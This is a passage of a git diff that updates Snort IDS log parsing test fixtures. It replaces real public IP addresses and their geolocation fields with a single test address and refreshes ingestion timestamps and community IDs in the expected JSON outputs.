[1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 175.16.199.1 -> 10.100.10.190 \ No newline at end of file diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json index 58e7bdd7d41..993e55a0bef 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json @@ -43,7 +43,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:46.712445649Z", + "ingested": "2021-12-09T13:44:49.150056700Z", "original": "05/30-19:09:10.917356 [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -\u003e 255.255.255.255:67", "timezone": "America/Chicago", "created": "2021-05-30T19:09:10.917-05:00", @@ -59,23 +59,25 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 3356, + "number": 4837, "organization": { - "name": "Level 3 Parent, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "4.2.2.3", + "address": "175.16.199.1", "port": 53, - "ip": "4.2.2.3" + "ip": "175.16.199.1" }, "rule": { "description": "ET DNS DNS Query to a .tk domain - Likely Hostile", @@ -92,7 +94,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:V4msnhdD0i+Grd4gC2ZiJJzsFr4=", + "community_id": "1:RZ4iVwBzp5juqzQJiu5WebaF9J4=", "transport": "udp", "type": "ipv4", "direction": "outbound" @@ -109,13 +111,13 @@ "related": { "ip": [ "192.168.88.10", - "4.2.2.3" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:46.712455162Z", - "original": "05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -\u003e 4.2.2.3:53", + "ingested": "2021-12-09T13:44:49.150067100Z", + "original": "05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -\u003e 175.16.199.1:53", "timezone": "America/Chicago", "created": "2021-05-30T19:09:28.472-05:00", "kind": "alert", @@ -129,8 +131,25 @@ }, { "destination": { - "address": "172.25.212.153", - "ip": "172.25.212.153" + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "ICMP Packet", @@ -138,17 +157,34 @@ "id": "477" }, "source": { - "address": "172.25.212.245", - "ip": "172.25.212.245" + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:pgNVNvJqM4JuAaqscZW8QapP0RY=", + "community_id": "1:ae//KI+huidgn9Nxeaibd8SUiVA=", "transport": "icmp", "type": "ipv4", - "direction": "internal" + "direction": "external" }, "observer": { "type": "ids", @@ -161,14 +197,13 @@ }, "related": { "ip": [ - "172.25.212.245", - "172.25.212.153" + "175.16.199.1" ] }, "event": { "severity": 0, - "ingested": "2021-09-20T12:26:46.712458339Z", - "original": "05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 172.25.212.245 -\u003e 172.25.212.153", + "ingested": "2021-12-09T13:44:49.150073400Z", + "original": "05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 175.16.199.1 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-05-30T19:09:10.917-05:00", "kind": "alert", @@ -182,9 +217,26 @@ }, { "destination": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", "port": 1900, - "address": "239.255.255.250", - "ip": "239.255.255.250" + "ip": "175.16.199.1" }, "rule": { "description": "SCAN UPnP service discover attempt", @@ -201,7 +253,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ljAAIPnv4XBxbFFvtvlYEM3fqjM=", + "community_id": "1:lTRw3g8ZdxItqss80+SSa07uVWc=", "transport": "tcp", "type": "ipv4", "direction": "outbound" @@ -218,13 +270,13 @@ "related": { "ip": [ "192.168.15.10", - "239.255.255.250" + "175.16.199.1" ] }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:46.712470808Z", - "original": "12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -\u003e 239.255.255.250:1900", + "ingested": "2021-12-09T13:44:49.150079300Z", + "original": "12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -\u003e 175.16.199.1:1900", "timezone": "America/Chicago", "created": "2021-12-30T14:09:21.116-06:00", "kind": "alert", @@ -250,29 +302,31 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Switzerland", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 8.1551, - "lat": 47.1449 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "CH" + "country_iso_code": "CN" }, "as": { - "number": 51852, + "number": 4837, "organization": { - "name": "Private Layer INC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "31.7.62.154", + "address": "175.16.199.1", "port": 80, - "ip": "31.7.62.154" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Szk4TjCqYPVVbo51bv6BPOdYxeU=", + "community_id": "1:qSaSgRpopkbN/a7ST5y66ztJl8U=", "transport": "tcp", "type": "ipv4", "direction": "inbound" @@ -288,14 +342,14 @@ }, "related": { "ip": [ - "31.7.62.154", + "175.16.199.1", "192.168.115.10" ] }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:46.712473968Z", - "original": "01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 31.7.62.154:80 -\u003e 192.168.115.10:1051", + "ingested": "2021-12-09T13:44:49.150085500Z", + "original": "01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 175.16.199.1:80 -\u003e 192.168.115.10:1051", "timezone": "America/Chicago", "created": "2021-01-21T02:23:42.327-06:00", "kind": "alert", @@ -320,28 +374,30 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Switzerland", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 8.1551, - "lat": 47.1449 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "CH" + "country_iso_code": "CN" }, "as": { - "number": 51852, + "number": 4837, "organization": { - "name": "Private Layer INC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "31.7.62.154", - "ip": "31.7.62.154" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:IRT4vxzCLjep4/T+6WX4EotOdB8=", + "community_id": "1:EtB/zlC1JmfdF0An9MzN1EDqn7o=", "transport": "icmp", "type": "ipv4", "direction": "inbound" @@ -357,14 +413,14 @@ }, "related": { "ip": [ - "31.7.62.154", + "175.16.199.1", "192.168.115.10" ] }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:46.712476882Z", - "original": "01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 31.7.62.154 -\u003e 192.168.115.10", + "ingested": "2021-12-09T13:44:49.150092Z", + "original": "01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 175.16.199.1 -\u003e 192.168.115.10", "timezone": "America/Chicago", "created": "2021-01-21T02:23:42.208-06:00", "kind": "alert", @@ -390,32 +446,31 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 53, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:+tvY16hIcwIZMAvm9DAQbxgXahM=", + "community_id": "1:Rj/XwIFirLCUpBLJSDip5ZzpVZY=", "transport": "udp", "type": "ipv4", "direction": "inbound" @@ -431,14 +486,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.100.10.190" ] }, "event": { "severity": 1, - "ingested": "2021-09-20T12:26:46.712479720Z", - "original": "09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 1.0.0.1:53 -\u003e 10.100.10.190:54757", + "ingested": "2021-12-09T13:44:49.150098100Z", + "original": "09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -\u003e 10.100.10.190:54757", "timezone": "America/Chicago", "created": "2021-09-04T21:55:02.041-05:00", "kind": "alert", @@ -464,32 +519,31 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 53, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:8Jc3rXjFsCVhS+Lf9eKcoDQ3T9k=", + "community_id": "1:lFRQEVyjqFCLDyAOzC3sRuoFLkI=", "transport": "udp", "type": "ipv4", "direction": "inbound" @@ -505,14 +559,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.100.10.190" ] }, "event": { "severity": 1, - "ingested": "2021-09-20T12:26:46.712482551Z", - "original": "09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 1.0.0.1:53 -\u003e 10.100.10.190:36312", + "ingested": "2021-12-09T13:44:49.150103900Z", + "original": "09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -\u003e 10.100.10.190:36312", "timezone": "America/Chicago", "created": "2021-09-04T21:55:02.118-05:00", "kind": "alert", @@ -527,22 +581,24 @@ { "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", - "ip": "1.1.1.1" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -558,7 +614,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2tRzWxcmOEdEZgq/cv3/yeRD60Q=", + "community_id": "1:jEaJsIOzda45Q8FjN0LeZEATihA=", "transport": "icmp", "type": "ipv4", "direction": "outbound" @@ -575,13 +631,13 @@ "related": { "ip": [ "10.100.10.190", - "1.1.1.1" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:46.712485352Z", - "original": "09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -\u003e 1.1.1.1", + "ingested": "2021-12-09T13:44:49.150110Z", + "original": "09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-09-04T21:54:43.216-05:00", "kind": "alert", @@ -606,28 +662,30 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", - "ip": "1.1.1.1" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:53l0pZVye5X9Nqti5cQB3Iiuohk=", + "community_id": "1:PsO7nB0G1KDZ1IDLocfXBmcxiaA=", "transport": "icmp", "type": "ipv4", "direction": "inbound" @@ -643,14 +701,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.100.10.190" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:46.712488163Z", - "original": "09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 1.1.1.1 -\u003e 10.100.10.190", + "ingested": "2021-12-09T13:44:49.150116Z", + "original": "09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 175.16.199.1 -\u003e 10.100.10.190", "timezone": "America/Chicago", "created": "2021-09-04T21:54:43.227-05:00", "kind": "alert", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log index 6c33ce94827..be051dde040 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log @@ -18,7 +18,7 @@ Len: 55 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] -09/04-21:53:15.299988 10.100.10.190 -> 172.217.1.142 +09/04-21:53:15.299988 10.100.10.190 -> 175.16.199.1 ICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF Type:8 Code:0 ID:101 Seq:1 ECHO @@ -30,7 +30,7 @@ TCP TTL:127 TOS:0x0 ID:61472 IpLen:20 DgmLen:40 DF [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] -09/04-21:53:15.309468 172.217.1.142 -> 10.100.10.190 +09/04-21:53:15.309468 175.16.199.1 -> 10.100.10.190 ICMP TTL:114 TOS:0x0 ID:0 IpLen:20 DgmLen:84 Type:0 Code:0 ID:101 Seq:1 ECHO REPLY diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json index c299ade79c5..ee6ae8b00df 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json @@ -42,7 +42,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-20T12:26:52.282202247Z", + "ingested": "2021-12-09T13:44:50.388577300Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Priority: 0] \n09/04-21:42:42.860730 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:53730 IpLen:20 DgmLen:108 DF\n***AP*** Seq: 0x688E00E4 Ack: 0xBC730BB6 Win: 0x80B TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:42:42.860-05:00", @@ -107,7 +107,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-20T12:26:52.282211291Z", + "ingested": "2021-12-09T13:44:50.388585300Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Priority: 0] \n09/04-21:42:42.903092 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:53731 IpLen:20 DgmLen:40 DF\n***A**** Seq: 0x688E0128 Ack: 0xBC730C02 Win: 0x80B TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:42:42.903-05:00", @@ -173,7 +173,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-20T12:26:52.282214398Z", + "ingested": "2021-12-09T13:44:50.388590600Z", "original": "[**] [1:1000005:0] UDP Connection [**]\n[Classification: A Network Trojan was Detected] [Priority: 1] \n09/04-21:53:15.299702 10.100.10.1:53 -\u003e 10.100.10.190:36635\nUDP TTL:64 TOS:0x0 ID:58363 IpLen:20 DgmLen:83\nLen: 55\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.299-05:00", @@ -201,22 +201,24 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "172.217.1.142", - "ip": "172.217.1.142" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -232,7 +234,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:FJFO06B7BHGpiUKepnudtPM+Ht8=", + "community_id": "1:jEaJsIOzda45Q8FjN0LeZEATihA=", "transport": "icmp", "type": "ipv4", "direction": "outbound" @@ -249,13 +251,13 @@ "related": { "ip": [ "10.100.10.190", - "172.217.1.142" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:52.282217306Z", - "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.299988 10.100.10.190 -\u003e 172.217.1.142\nICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF\nType:8 Code:0 ID:101 Seq:1 ECHO\n", + "ingested": "2021-12-09T13:44:50.388595300Z", + "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.299988 10.100.10.190 -\u003e 175.16.199.1\nICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF\nType:8 Code:0 ID:101 Seq:1 ECHO\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.299-05:00", "kind": "alert", @@ -326,7 +328,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:52.282220234Z", + "ingested": "2021-12-09T13:44:50.388633200Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Classification: Potentially Bad Traffic] [Priority: 2] \n09/04-21:53:15.301504 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:61472 IpLen:20 DgmLen:40 DF\n***A**** Seq: 0x68940D74 Ack: 0xBC811F16 Win: 0x80E TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.301-05:00", @@ -362,28 +364,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "172.217.1.142", - "ip": "172.217.1.142" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:IQDPFXUq/FFKt7MDyxeynVaxDb0=", + "community_id": "1:PsO7nB0G1KDZ1IDLocfXBmcxiaA=", "transport": "icmp", "type": "ipv4", "direction": "inbound" @@ -399,14 +403,14 @@ }, "related": { "ip": [ - "172.217.1.142", + "175.16.199.1", "10.100.10.190" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:52.282223115Z", - "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.309468 172.217.1.142 -\u003e 10.100.10.190\nICMP TTL:114 TOS:0x0 ID:0 IpLen:20 DgmLen:84\nType:0 Code:0 ID:101 Seq:1 ECHO REPLY\n", + "ingested": "2021-12-09T13:44:50.388660400Z", + "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.309468 175.16.199.1 -\u003e 10.100.10.190\nICMP TTL:114 TOS:0x0 ID:0 IpLen:20 DgmLen:84\nType:0 Code:0 ID:101 Seq:1 ECHO REPLY\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.309-05:00", "kind": "alert", @@ -476,7 +480,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-20T12:26:52.282225933Z", + "ingested": "2021-12-09T13:44:50.388681Z", "original": "[**] [1:1000005:0] UDP Connection [**]\n[Classification: A Network Trojan was Detected] [Priority: 1] \n09/04-21:53:15.358155 10.100.10.1:53 -\u003e 10.100.10.190:56012\nUDP TTL:64 TOS:0x0 ID:33955 IpLen:20 DgmLen:153\nLen: 125", "timezone": "-05:00", "created": "2021-09-04T21:53:15.358-05:00", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log index b398727811c..ebe71dcd915 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log @@ -1,3 +1,3 @@ -09/03/21-12:37:16.428952 ,1,2403488,68499,"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95",TCP,89.248.168.157,36847,104.5.30.130,91,54321,Misc Attack,2,alert,Allow -09/03/21-12:56:44.310212 ,1,2011716,4,"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)",UDP,193.46.255.221,5103,104.5.30.130,5060,54925,Attempted Information Leak,2,alert,Allow -09/03/21-16:29:03.494387 ,1,477,3,"ICMP Packet",ICMP,104.5.30.130,,104.5.30.1,,40546,,0,alert,Allow \ No newline at end of file +09/03/21-12:37:16.428952 ,1,2403488,68499,"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95",TCP,175.16.199.1,36847,175.16.199.1,91,54321,Misc Attack,2,alert,Allow +09/03/21-12:56:44.310212 ,1,2011716,4,"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)",UDP,175.16.199.1,5103,175.16.199.1,5060,54925,Attempted Information Leak,2,alert,Allow +09/03/21-16:29:03.494387 ,1,477,3,"ICMP Packet",ICMP,175.16.199.1,,175.16.199.1,,40546,,0,alert,Allow \ No newline at end of file diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json index ee45c9823af..a707d940347 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json @@ -3,26 +3,25 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -98.437, - "lat": 29.6285 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "104.5.30.130", + "address": "175.16.199.1", "port": 91, - "ip": "104.5.30.130" + "ip": "175.16.199.1" }, "rule": { "description": "ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95", @@ -32,29 +31,31 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "Netherlands", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 4.8995, - "lat": 52.3824 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "NL" + "country_iso_code": "CN" }, "as": { - "number": 202425, + "number": 4837, "organization": { - "name": "IP Volume inc" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "89.248.168.157", + "address": "175.16.199.1", "port": 36847, - "ip": "89.248.168.157" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:gP8zVsvHjM6/aBDhAEaqZYTtbec=", + "community_id": "1:QZjg2eWEv0AR1/Sfa6zE1x0jQIg=", "transport": "tcp", "type": "ipv4", "direction": "external" @@ -70,14 +71,13 @@ }, "related": { "ip": [ - "89.248.168.157", - "104.5.30.130" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:55.088053208Z", - "original": "09/03/21-12:37:16.428952 ,1,2403488,68499,\"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95\",TCP,89.248.168.157,36847,104.5.30.130,91,54321,Misc Attack,2,alert,Allow", + "ingested": "2021-12-09T13:44:51.135040700Z", + "original": "09/03/21-12:37:16.428952 ,1,2403488,68499,\"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95\",TCP,175.16.199.1,36847,175.16.199.1,91,54321,Misc Attack,2,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T12:37:16.428-06:00", "kind": "alert", @@ -98,26 +98,25 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -98.437, - "lat": 29.6285 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "104.5.30.130", + "address": "175.16.199.1", "port": 5060, - "ip": "104.5.30.130" + "ip": "175.16.199.1" }, "rule": { "description": "ET SCAN Sipvicious User-Agent Detected (friendly-scanner)", @@ -127,29 +126,31 @@ }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "United Kingdom", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -0.1224, - "lat": 51.4964 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "GB" + "country_iso_code": "CN" }, "as": { - "number": 35478, + "number": 4837, "organization": { - "name": "Bunea TELECOM SRL" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "193.46.255.221", + "address": "175.16.199.1", "port": 5103, - "ip": "193.46.255.221" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:T2S1O17uzHSgP2sKz5R4Hd/ipfs=", + "community_id": "1:dHh+jdcD2h6T0VDqCQgahOokJmk=", "transport": "udp", "type": "ipv4", "direction": "external" @@ -165,14 +166,13 @@ }, "related": { "ip": [ - "193.46.255.221", - "104.5.30.130" + "175.16.199.1" ] }, "event": { "severity": 2, - "ingested": "2021-09-20T12:26:55.088062194Z", - "original": "09/03/21-12:56:44.310212 ,1,2011716,4,\"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)\",UDP,193.46.255.221,5103,104.5.30.130,5060,54925,Attempted Information Leak,2,alert,Allow", + "ingested": "2021-12-09T13:44:51.135050100Z", + "original": "09/03/21-12:56:44.310212 